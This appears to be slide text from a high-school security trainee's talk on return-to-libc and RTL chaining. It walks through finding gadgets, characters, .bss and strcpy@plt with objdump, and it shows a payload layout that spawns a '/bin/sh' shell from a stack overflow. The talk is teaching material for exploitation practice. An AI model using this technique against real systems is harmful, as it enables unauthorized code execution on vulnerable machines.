RTL Chaining
송상준
sangjun_123@naver.com
Seocho High School

Contents
- About me
- RTL Chaining
- Demo

About me
- 2nd-year student at Seocho High School
- Best of the Best 4th-cohort trainee
- Member of the information security team Hack.Cat
- s0ngsari.tistory.com

Return to Libc
[*] First, Get Library Address, Library argument
print libraryname
find &system, +9999, "/bin/sh"

Return to Libc
[*] Finally, Just Attack!
- Buffer[?] + SFP[4] + system + exit + /bin/sh
system("/bin/sh") -> exit(0);

RTL Chaining
[*] First, Find Gadget (pop .. ret)
Usage: objdump -d ./binary
pop ret = 0x0804852f
pop ret = 0x0804852e

RTL Chaining
[*] Second, Find 1 byte char (/bin/sh)
Usage: objdump -s ./binary | grep "/"
- 0x08048154
All of (/, b, i, n, s, h, \x00) must be found.

RTL Chaining
[*] Third, Find .bss Address
Usage: objdump -h ./binary | grep bss
- insert char (/bin/sh) in .bss (custom stack)
bss = 0x0804a028
bss size = 1028 byte

RTL Chaining
[*] Fourth, Find vuln@plt
strcpy@plt = 0x080483a0
The offset in jmp ds:offset is the GOT address!!

RTL Chaining
Finish!!
I Have.. [Gadget, character, bss, strcpy@plt, system]

Attack Scenario
[*] Payload
strcpy@plt + ppr + .bss + "/" ... system + exit + bss
C Code? -> strcpy(&bss[0], "/"); strcpy(&bss[1], "b"); ...

Demo
[Environment]
- Ubuntu 14.04 LTS
- Netcat Remote Server
- gcc -o exploit.c -fno-stack-protector